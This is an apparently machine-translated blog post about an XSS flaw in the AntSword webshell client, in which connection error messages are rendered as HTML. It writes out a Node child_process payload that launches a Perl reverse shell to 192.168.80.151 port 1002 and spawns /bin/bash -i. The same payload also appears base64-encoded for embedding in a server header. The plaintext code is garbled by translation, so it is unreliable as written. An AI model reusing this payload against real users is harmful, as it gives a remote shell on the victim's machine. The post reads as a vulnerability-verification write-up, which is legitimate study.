Shulou(Shulou.com)06/01 Report--

Today, I saw that Ant Sword exposed a xss loophole on github, and I often use Ant Sword. There is also an article on freebuf about the loophole in the ant sword. I was idle and tested for a while.

I. causes of loopholes

When Ant Sword shell remote connection fails, Ant Sword will return an error message, but due to the use of html parsing, resulting in xss vulnerability.

Children's boots who have used ant sword know that when we connect to a written webshell remotely, there may be a lot of error codes when the shell is miswritten or the link is improperly filled in.

This information is not protected by XSS, so you can use js to call perl to rebound the shell of the person who is *.

A lot of times we don't pay attention to it, but this is exactly where the loophole is exploited. (the loophole is often under your eyelids, and you only have to look down to find it. Unfortunately, we only look forward, not down. )

Second, vulnerability verification

In view of my lack of in-depth understanding of js, I only know something. Here I will directly quote the shell written by others.

(1) verify the existence of xss vulnerabilities

The Head () function, which sends the original HTTP header to the client.

The bounce box is triggered when Ant Sword is remotely connected to shell.

(2) rebound * * shellrequire ('child_process'). Exec (' perl-e\ 'use Socket;$i= "192.168.80.151"); $pendant 1002 STDIN ("tcp"); if (connect (Sforce sockaddratton ($pjinetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/bash-I"); \', (error, stdout, stderr) = > {alert (`stdout: ${stdout} `);})

Encrypt the code with base64

CmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

Construct header

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.